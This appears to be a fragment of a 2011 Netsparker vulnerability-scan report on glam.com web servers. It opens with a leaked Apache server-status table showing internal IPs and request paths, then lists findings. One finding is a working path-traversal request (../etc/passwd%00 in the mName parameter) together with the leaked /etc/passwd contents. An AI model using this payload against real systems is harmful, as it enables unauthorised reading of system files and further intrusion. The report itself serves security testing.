HTTP/1.0</td></tr><tr><td><b>29-1</b></td><td>-</td><td>0/0/16</td><td>.</td><td>0.72</td><td>310895</td><td>0</td><td>0.0</td><td>0.00</td><td>0.34</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>30-1</b></td><td>-</td><td>0/0/8</td><td>.</td><td>0.63</td><td>310919</td><td>0</td><td>0.0</td><td>0.00</td><td>0.04</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>31-1</b></td><td>-</td><td>0/0/5</td><td>.</td><td>0.32</td><td>310942</td><td>0</td><td>0.0</td><td>0.00</td><td>0.04</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>32-1</b></td><td>-</td><td>0/0/1725</td><td>.</td><td>85.57</td><td>308786</td><td>154</td><td>0.0</td><td>0.00</td><td>26.97</td><td>10.0.3.7</td><td nowrap>10.0.4.167</td><td nowrap>GET /gad/glamadapt_srv.act?_ge_=1^2^e74b92579e6ad51a52cb26eee4b</td></tr><tr><td><b>33-1</b></td><td>-</td><td>0/0/1</td><td>.</td><td>0.00</td><td>310961</td><td>0</td><td>0.0</td><td>0.00</td><td>0.00</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>34-1</b></td><td>-</td><td>0/0/23</td><td>.</td><td>1.19</td><td>310882</td><td>0</td><td>0.0</td><td>0.00</td><td>0.38</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>35-1</b></td><td>-</td><td>0/0/1721</td><td>.</td><td>82.51</td><td>308776</td><td>4</td><td>0.0</td><td>0.00</td><td>27.91</td><td>10.0.4.6</td><td nowrap>10.0.4.167</td><td nowrap>GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs&af</td></tr><tr><td><b>36-1</b></td><td>-</td><td>0/0/3</td><td>.</td><td>0.01</td><td>310947</td><td>0</td><td>0.0</td><td>0.00</td><td>0.05</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>37-1</b></td><td>-</td><td>0/0/10</td><td>.</td><td>0.41</td><td>310917</td><td>0</td><td>0.0</td><td>0.00</td><td>0.22</td><td>::1</td><td nowrap>10.0.4.167</td><td nowrap>OPTIONS * HTTP/1.0</td></tr><tr><td><b>38-1</b></td><td>-</td><td>0/0/30</td><td>.</td><td>1...
Forbidden Resource
Forbidden Resource
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.
Impact
There is no impact resulting from this issue.
Request
GET /app/site/affiliate/ HTTP/1.1
Response
HTTP/1.1 403 Forbidden
Server: Apache/2.2.3 (CentOS)
Content-Length: 299
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 21 Apr 2011 01:24:48 GMT
Connection: keep-alive
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /app/site/affiliate/on this server.</p><hr><address>Apache/2.2.3 (CentOS) Server at www2.glam.com Port 80</address></body></html>
[Possible] Internal Path Leakage (*nix)
[Possible] Internal Path Leakage (*nix)
Netsparker identified an internal path in the document.
Impact
There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.
Error messages should be disabled.
Remove this kind of private data from the output.
External References
- /app/site/affiliate/viewChannelModule.act
/bin/bash /sbin/nologin /var/adm:/sbin/nologin /var/spool/lpd:/sbin/nologin /bin/sync /sbin/shutdown /sbin/halt /var/spool/mail:/sbin/nologin /etc/news: /var/spool/uucp:/sbin/nologin /usr/games:/sbin/nologin /var/gopher:/sbin/nologin /var/ftp:/sbin/nologin /var/arpwatch:/sbin/nologin /var/spool/mqueue:/sbin/nologin /var/empty/sshd:/sbin/nologin /var/lib/nfs:/sbin/nologin /var/lib/avahi-autoipd:/sbin/nologin /home/prod:/bin/bash /var/www:/sbin/nologin
Request
GET /app/site/affiliate/viewChannelModule.act?mName=../../../../../../../../../../../etc/passwd%00&affiliateId=0&adSize=300x85 HTTP/1.1
Response
HTTP/1.1 200 OK
